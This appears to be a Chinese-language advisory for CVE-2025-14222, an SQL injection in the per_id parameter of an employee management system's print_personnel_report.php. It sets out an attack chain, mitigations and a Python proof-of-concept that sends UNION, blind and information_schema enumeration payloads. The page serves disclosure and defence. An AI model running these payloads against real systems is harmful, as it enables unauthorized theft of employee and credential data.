CVE-2025-14222 | code-projects Employee Profile Management System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14222

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Employee Profile Management System 1.0

漏洞概述

CVE-2025-14222是code-projects团队开发的Employee Profile Management System 1.0版本中存在的SQL注入漏洞。该漏洞位于/print_personnel_report.php文件中，对per_id参数的处理存在安全缺陷。攻击者可以通过构造恶意的per_id参数值，绕过应用程序的输入验证，将任意SQL语句注入到后端数据库执行。由于该漏洞可通过网络远程利用，且只需要低权限认证即可发起攻击，因此具有较高的实际威胁性。成功利用此漏洞可能导致敏感数据库信息泄露，包括员工个人信息、薪资数据、考勤记录等机密数据。此外，攻击者还可能通过SQL注入获取数据库管理权限，进一步控制整个系统或将其作为跳板进行横向渗透攻击。该漏洞于2025年12月8日披露，CVSS评分6.3，属于中等严重程度。

技术细节

该SQL注入漏洞存在于Employee Profile Management System 1.0的print_personnel_report.php文件中。漏洞的根本原因是对用户输入的per_id参数缺乏充分的输入验证和参数化查询处理。攻击者可以利用UNION SELECT、布尔盲注、时间盲注或报错注入等技术来提取数据库信息。在未使用预编译语句的情况下，应用程序直接将用户输入拼接到SQL查询语句中，攻击者可以通过在per_id参数中注入SQL代码来修改原始查询的逻辑。例如，攻击者可以构造如per_id=1' OR '1'='1的Payload来绕过认证或提取额外数据。由于该应用可能使用MySQL或类似数据库，攻击者还可以通过INFORMATION_SCHEMA查询获取数据库结构信息，进而枚举所有表和字段。此漏洞需要低权限认证，但攻击者获取的凭据可能已被泄露或通过其他方式获取。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标系统，识别运行Employee Profile Management System 1.0的Web服务器

STEP 2

步骤2

发现漏洞点：访问/print_personnel_report.php文件，识别per_id参数存在SQL注入漏洞

STEP 3

步骤3

认证获取：使用低权限账号登录系统或通过其他方式获取有效会话

STEP 4

步骤4

Payload构造：根据数据库类型构造SQL注入Payload，如UNION注入或布尔盲注

STEP 5

步骤5

数据提取：通过注入Payload提取数据库中的敏感信息，如员工数据、用户凭据等

STEP 6

步骤6

权限提升：利用获取的数据库信息进一步获取管理员权限或系统控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-14222 PoC - SQL Injection in Employee Profile Management System
# Target: /print_personnel_report.php
# Parameter: per_id

TARGET_URL = "http://target.com/print_personnel_report.php"

def exploit_sql_injection():
    """
    SQL Injection PoC for CVE-2025-14222
    This demonstrates extracting database version information
    """
    
    # Basic injection to verify vulnerability
    payload_basic = "1' OR '1'='1"
    
    # Extract database version using UNION injection
    payload_union = "1' UNION SELECT NULL,NULL,version(),NULL,NULL-- -"
    
    # Extract current database name
    payload_dbname = "1' UNION SELECT NULL,NULL,database(),NULL,NULL-- -"
    
    # Extract all table names from information_schema
    payload_tables = "1' UNION SELECT NULL,GROUP_CONCAT(table_name),NULL,NULL,NULL FROM information_schema.tables WHERE table_schema=database()-- -"
    
    # Boolean-based blind injection for data extraction
    payload_blind = "1' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)='1"
    
    payloads = {
        'basic_verification': payload_basic,
        'db_version': payload_union,
        'db_name': payload_dbname,
        'table_enum': payload_tables,
        'blind_test': payload_blind
    }
    
    print("[*] CVE-2025-14222 SQL Injection PoC")
    print(f"[*] Target: {TARGET_URL}")
    
    for test_name, payload in payloads.items():
        print(f"\n[+] Testing: {test_name}")
        print(f"[+] Payload: {payload}")
        
        try:
            data = {'per_id': payload}
            response = requests.post(TARGET_URL, data=data, timeout=10)
            
            if response.status_code == 200:
                print(f"[+] Response received, length: {len(response.text)}")
                # Check for SQL error indicators
                if 'mysql' in response.text.lower() or 'sql' in response.text.lower():
                    print("[!] SQL-related content detected in response")
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    exploit_sql_injection()

影响范围

code-projects Employee Profile Management System 1.0

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 在Web应用层部署输入验证，过滤SQL特殊字符如单引号、分号、UNION等关键字；2) 使用ModSecurity等WAF规则阻止可疑的SQL注入请求；3) 限制该接口的访问权限，仅允许受信任的IP访问；4) 对per_id参数实施严格的白名单验证，确保输入为有效的数字ID；5) 临时禁用print_personnel_report.php文件或将其重命名以降低风险；6) 加强数据库账户权限，移除不必要的表查询权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14222
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14222
3 Details https://www.cvedetails.com/cve/CVE-2025-14222/
4 VulDB https://vuldb.com/cve/CVE-2025-14222
5 Link https://code-projects.org/
6 Link https://github.com/tiancesec/CVE/issues/14
7 Link https://vuldb.com/?ctiid.334664
8 Link https://vuldb.com/?id.334664
9 Link https://vuldb.com/?submit.701636
10 Link https://github.com/tiancesec/CVE/issues/14